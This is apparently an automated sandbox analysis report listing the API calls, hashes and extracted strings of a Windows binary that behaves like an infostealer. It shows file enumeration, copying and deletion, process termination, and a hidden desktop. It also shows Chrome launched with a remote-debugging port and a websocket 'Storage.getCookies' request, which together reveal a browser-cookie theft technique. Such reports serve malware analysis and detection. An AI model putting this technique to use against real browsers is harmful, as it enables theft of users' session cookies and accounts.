                                    • Opcode ID: 9d179ac59f28258a361bb76bd3246109d05dab1ff4bd623b1f98f019695eac0b
                                    • Instruction ID: 3b090390f33d7a6bd9a847703576432ee8027a0122b0d6fe44dfcb0ba5eefcc6
                                    • Opcode Fuzzy Hash: 9d179ac59f28258a361bb76bd3246109d05dab1ff4bd623b1f98f019695eac0b
                                    • Instruction Fuzzy Hash: 0C926030A126118FDB64DF29D948BAAB7F5BF45715F1980ADE809DB3A2D731DC82CB40
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B1291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B12BF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B12CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12E7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B12F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B133A
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B135C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B1376
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B13AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B13D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B13E2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B13ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B140A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1416
                                    • lstrlen.KERNEL32(?), ref: 000B1423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1443
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B1451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B147A
                                    • StrCmpCA.SHLWAPI(?,00E6CD58), ref: 000B14A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B14E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1535
                                    • StrCmpCA.SHLWAPI(?,00E6D3A8), ref: 000B1552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B15BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B15E4
                                    • StrCmpCA.SHLWAPI(?,00E6CD10), ref: 000B1602
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1633
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B165C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1685
                                    • StrCmpCA.SHLWAPI(?,00E6CE00), ref: 000B16B3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B16F4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B171D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1745
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B17BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B17F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000B181C
                                    • FindClose.KERNEL32(00000000), ref: 000B182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: ba80b283abd8fb7ea72e9081a346f649f99ade2b879702d6a7cd0e27dcb052ac
                                    • Instruction ID: 11540c156ec9a5e4ef031a1f83bae615c38d0f7b51821eec834928b9a9cecb45
                                    • Opcode Fuzzy Hash: ba80b283abd8fb7ea72e9081a346f649f99ade2b879702d6a7cd0e27dcb052ac
                                    • Instruction Fuzzy Hash: ED129E71A112069BCB24EFB8E899AEF77F8AF44700F444529F88AD7651EF30DC458B91
                                    APIs
                                    • wsprintfA.USER32 ref: 000BCBFC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BCC13
                                    • lstrcat.KERNEL32(?,?), ref: 000BCC5F
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BCC71
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BCC8B
                                    • wsprintfA.USER32 ref: 000BCCB0
                                    • PathMatchSpecA.SHLWAPI(?,00E689C0), ref: 000BCCE2
                                    • CoInitialize.OLE32(00000000), ref: 000BCCEE
                                      • Part of subcall function 000BCAE0: CoCreateInstance.COMBASE(000CB110,00000000,00000001,000CB100,?), ref: 000BCB06
                                      • Part of subcall function 000BCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 000BCB46
                                      • Part of subcall function 000BCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 000BCBC9
                                    • CoUninitialize.COMBASE ref: 000BCD09
                                    • lstrcat.KERNEL32(?,?), ref: 000BCD2E
                                    • lstrlen.KERNEL32(?), ref: 000BCD3B
                                    • StrCmpCA.SHLWAPI(?,000CCFEC), ref: 000BCD55
                                    • wsprintfA.USER32 ref: 000BCD7D
                                    • wsprintfA.USER32 ref: 000BCD9C
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 000BCDB0
                                    • wsprintfA.USER32 ref: 000BCDD8
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000BCDF1
                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 000BCE10
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 000BCE28
                                    • CloseHandle.KERNEL32(00000000), ref: 000BCE33
                                    • CloseHandle.KERNEL32(00000000), ref: 000BCE3F
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000BCE54
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BCE94
                                    • FindNextFileA.KERNEL32(?,?), ref: 000BCF8D
                                    • FindClose.KERNEL32(?), ref: 000BCF9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                    • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 3860919712-2388001722
                                    • Opcode ID: c86451223aada1c8ecec64b96fd274818947ea94d513d2fc38933df7849456ef
                                    • Instruction ID: 568a2dabd5adc3d9bf3c085ef495a8c9b33573f0d013efaca824b0c09f0f026e
                                    • Opcode Fuzzy Hash: c86451223aada1c8ecec64b96fd274818947ea94d513d2fc38933df7849456ef
                                    • Instruction Fuzzy Hash: F6C16271A01219AFDB64DF64EC49EEE77B9FF54300F0445A9F509A7291EA30AE84CF60
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B1291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B12BF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B12CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12E7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B12F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B133A
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B135C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B1376
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B13AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B13D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B13E2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B13ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B140A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1416
                                    • lstrlen.KERNEL32(?), ref: 000B1423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1443
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B1451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B147A
                                    • StrCmpCA.SHLWAPI(?,00E6CD58), ref: 000B14A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B14E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1535
                                    • StrCmpCA.SHLWAPI(?,00E6D3A8), ref: 000B1552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B15BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B15E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B17BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B17F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000B181C
                                    • FindClose.KERNEL32(00000000), ref: 000B182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: 5a2298d76afe93e21b5884eb27a698b299169cd09e34651abab96f1a94c7af78
                                    • Instruction ID: 89ebd85d01535c5550a658b43206197ebde3b7c5331d8d0bf821ae983e2e9833
                                    • Opcode Fuzzy Hash: 5a2298d76afe93e21b5884eb27a698b299169cd09e34651abab96f1a94c7af78
                                    • Instruction Fuzzy Hash: A4C1B331A112169BCB61EFB8EC99AEF77F8AF11700F440039F84A97652EB30DD458B91
                                    APIs
                                    • memset.MSVCRT ref: 000A9790
                                    • lstrcat.KERNEL32(?,?), ref: 000A97A0
                                    • lstrcat.KERNEL32(?,?), ref: 000A97B1
                                    • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 000A97C3
                                    • memset.MSVCRT ref: 000A97D7
                                      • Part of subcall function 000C3E70: lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C3EA5
                                      • Part of subcall function 000C3E70: lstrcpy.KERNEL32(00000000,00E69DA8), ref: 000C3ECF
                                      • Part of subcall function 000C3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,000A134E,?,0000001A), ref: 000C3ED9
                                    • wsprintfA.USER32 ref: 000A9806
                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 000A9827
                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 000A9844
                                      • Part of subcall function 000C46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C46B9
                                      • Part of subcall function 000C46A0: Process32First.KERNEL32(00000000,00000128), ref: 000C46C9
                                      • Part of subcall function 000C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 000C46DB
                                      • Part of subcall function 000C46A0: StrCmpCA.SHLWAPI(?,?), ref: 000C46ED
                                      • Part of subcall function 000C46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C4702
                                      • Part of subcall function 000C46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 000C4711
                                      • Part of subcall function 000C46A0: CloseHandle.KERNEL32(00000000), ref: 000C4718
                                      • Part of subcall function 000C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 000C4726
                                      • Part of subcall function 000C46A0: CloseHandle.KERNEL32(00000000), ref: 000C4731
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A9878
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A9889
                                    • lstrcat.KERNEL32(00000000,000D4B60), ref: 000A989B
                                    • memset.MSVCRT ref: 000A98AF
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 000A98D4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A9903
                                    • StrStrA.SHLWAPI(00000000,00E6E0C8), ref: 000A9919
                                    • lstrcpyn.KERNEL32(002D93D0,00000000,00000000), ref: 000A9938
                                    • lstrlen.KERNEL32(?), ref: 000A994B
                                    • wsprintfA.USER32 ref: 000A995B
                                    • lstrcpy.KERNEL32(?,00000000), ref: 000A9971
                                    • Sleep.KERNEL32(00001388), ref: 000A99E7
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A92E1
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A92FA
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A9399
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A93E6
                                      • Part of subcall function 000C4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 000C4759
                                      • Part of subcall function 000C4740: Process32First.KERNEL32(00000000,00000128), ref: 000C4769
                                      • Part of subcall function 000C4740: Process32Next.KERNEL32(00000000,00000128), ref: 000C477B
                                      • Part of subcall function 000C4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C479C
                                      • Part of subcall function 000C4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 000C47AB
                                      • Part of subcall function 000C4740: CloseHandle.KERNEL32(00000000), ref: 000C47B2
                                      • Part of subcall function 000C4740: Process32Next.KERNEL32(00000000,00000128), ref: 000C47C0
                                      • Part of subcall function 000C4740: CloseHandle.KERNEL32(00000000), ref: 000C47CB
                                    • CloseDesktop.USER32(?), ref: 000A9A1C
                                    Strings
                                    Similarity
                                    • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                    • API String ID: 958055206-1862457068
                                    • Opcode ID: 8a8662f7260570ec1e2a8fa715b03129e5bbd86f6e4563cce417e01d0aad1f0b
                                    • Instruction ID: 8f523d1975200dda6671e5a466d3e75e041c975ba6534384afc1442b7ab8ed2a
                                    • Opcode Fuzzy Hash: 8a8662f7260570ec1e2a8fa715b03129e5bbd86f6e4563cce417e01d0aad1f0b
                                    • Instruction Fuzzy Hash: C7917571A10208EFDB50EFA4DC49FDE77B8AF58700F148199F609A7291DF70AE448BA0
                                    APIs
                                    • wsprintfA.USER32 ref: 000BE22C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BE243
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BE263
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BE27D
                                    • wsprintfA.USER32 ref: 000BE2A2
                                    • StrCmpCA.SHLWAPI(?,000CCFEC), ref: 000BE2B4
                                    • wsprintfA.USER32 ref: 000BE2D1
                                      • Part of subcall function 000BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 000BEE12
                                    • wsprintfA.USER32 ref: 000BE2F0
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 000BE304
                                    • lstrcat.KERNEL32(?,00E6E548), ref: 000BE335
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BE347
                                    • lstrcat.KERNEL32(?,?), ref: 000BE358
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BE36A
                                    • lstrcat.KERNEL32(?,?), ref: 000BE37E
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000BE394
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE3D2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE422
                                    • DeleteFileA.KERNEL32(?), ref: 000BE45C
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000BE49B
                                    • FindClose.KERNEL32(00000000), ref: 000BE4AA
                                    Strings
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                    • String ID: %s\%s$%s\*$H
                                    • API String ID: 1375681507-1873429620
                                    • Opcode ID: 81088f19483537e991d4dc8729f6c5ee4668cc17a9ad42fc9cc78b54a46778e6
                                    • Instruction ID: 2def16431e877e2edff133d770669fd089dbf56932d8ba7e29736a73eea5b7fc
                                    • Opcode Fuzzy Hash: 81088f19483537e991d4dc8729f6c5ee4668cc17a9ad42fc9cc78b54a46778e6
                                    • Instruction Fuzzy Hash: CE815F71D00218AFCB20EFB4EC49AEE77B9BF54300F4449A9B50A97151EB34AE44CFA0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000BDD45
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000BDD4C
                                    • wsprintfA.USER32 ref: 000BDD62
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BDD79
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BDD9C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BDDB6
                                    • wsprintfA.USER32 ref: 000BDDD4
                                    • DeleteFileA.KERNEL32(?), ref: 000BDE20
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000BDDED
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                      • Part of subcall function 000BD980: memset.MSVCRT ref: 000BD9A1
                                      • Part of subcall function 000BD980: memset.MSVCRT ref: 000BD9B3
                                      • Part of subcall function 000BD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BD9DB
                                      • Part of subcall function 000BD980: lstrcpy.KERNEL32(00000000,?), ref: 000BDA0E
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,00000000), ref: 000BDA1C
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,00E6E098), ref: 000BDA36
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,?), ref: 000BDA4A
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,00E6CDE8), ref: 000BDA5E
                                      • Part of subcall function 000BD980: lstrcpy.KERNEL32(00000000,?), ref: 000BDA8E
                                      • Part of subcall function 000BD980: GetFileAttributesA.KERNEL32(00000000), ref: 000BDA95
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000BDE2E
                                    • FindClose.KERNEL32(00000000), ref: 000BDE3D
                                    • lstrcat.KERNEL32(?,00E6E548), ref: 000BDE66
                                    • lstrcat.KERNEL32(?,00E6D248), ref: 000BDE7A
                                    • lstrlen.KERNEL32(?), ref: 000BDE84
                                    • lstrlen.KERNEL32(?), ref: 000BDE92
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BDED2
                                    Strings
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                    • String ID: %s\%s$%s\*$H
                                    • API String ID: 4184593125-1873429620
                                    • Opcode ID: 2259a9e0f817e34eb5487815d066b7074eb8392a8eaaea93d6e5ecc5c047fe69
                                    • Instruction ID: c2b36d9a96d3184374d878d7fc5512b0feadde3606f7d1c58dfd60c1a6bc6dc3
                                    • Opcode Fuzzy Hash: 2259a9e0f817e34eb5487815d066b7074eb8392a8eaaea93d6e5ecc5c047fe69
                                    • Instruction Fuzzy Hash: F5614271E11208AFCB10EFB4EC89AEE77B9BF58301F4045AAB54997251EB34EE44CB51
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A16E2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A176C
                                    • lstrcat.KERNEL32(00000000), ref: 000A1776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A17A2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A18F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A18FE
                                    Strings
                                    Similarity
                                    • API ID: lstrcpy$lstrcat
                                    • String ID: \*.*
                                    • API String ID: 2276651480-1173974218
                                    • Opcode ID: 2d795a0ed514c74ad40d64090a7372789ec38a0dd951cdd5c7430574d51bb8f4
                                    • Instruction ID: fa860b62d46c108df0bb1f814654ff4bd496aba15c564846555288bdb2385d94
                                    • Opcode Fuzzy Hash: 2d795a0ed514c74ad40d64090a7372789ec38a0dd951cdd5c7430574d51bb8f4
                                    • Instruction Fuzzy Hash: 72813031A11216DBCB21EFE8D989AEF77F5AF16701F040129F805AB662DB34DD41CBA1
                                    APIs
                                    • wsprintfA.USER32 ref: 000BD54D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BD564
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BD584
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BD59E
                                    • lstrcat.KERNEL32(?,00E6E548), ref: 000BD5E3
                                    • lstrcat.KERNEL32(?,00E6E588), ref: 000BD5F7
                                    • lstrcat.KERNEL32(?,?), ref: 000BD60B
                                    • lstrcat.KERNEL32(?,?), ref: 000BD61C
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BD62E
                                    • lstrcat.KERNEL32(?,?), ref: 000BD642
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BD682
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BD6D2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000BD737
                                    • FindClose.KERNEL32(00000000), ref: 000BD746
                                    Strings
                                    Similarity
                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                    • String ID: %s\%s$H
                                    • API String ID: 50252434-75073723
                                    • Opcode ID: 6ff0591dc86897ce45b6b63bf5092a06a0fd941ad86525acb3f7be22e2c8b6bd
                                    • Instruction ID: ded34ac9cce4a72c1b1aa15f36a0467a4aa397ba3a16c25453554995a86d7f84
                                    • Opcode Fuzzy Hash: 6ff0591dc86897ce45b6b63bf5092a06a0fd941ad86525acb3f7be22e2c8b6bd
                                    • Instruction Fuzzy Hash: 15616471D11219AFCB10EFB4DC88ADEB7B4AF59301F0044A6F64997251EB34AE44CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                    • API String ID: 909987262-758292691
                                    • Opcode ID: 80f5f676477a818c3a3616f9dd8b8eac472b73b30050bea4fbfc189da40cf77b
                                    • Instruction ID: b69c400d844ada65acf7b4a033fef36661b133235ace5ed1b663b1439eea4492
                                    • Opcode Fuzzy Hash: 80f5f676477a818c3a3616f9dd8b8eac472b73b30050bea4fbfc189da40cf77b
                                    • Instruction Fuzzy Hash: 93A25A75D012699FDB20CFA8CC94BEDBBB6BF48301F1481AAE518A7241DB716E85CF50
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B23D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B23F7
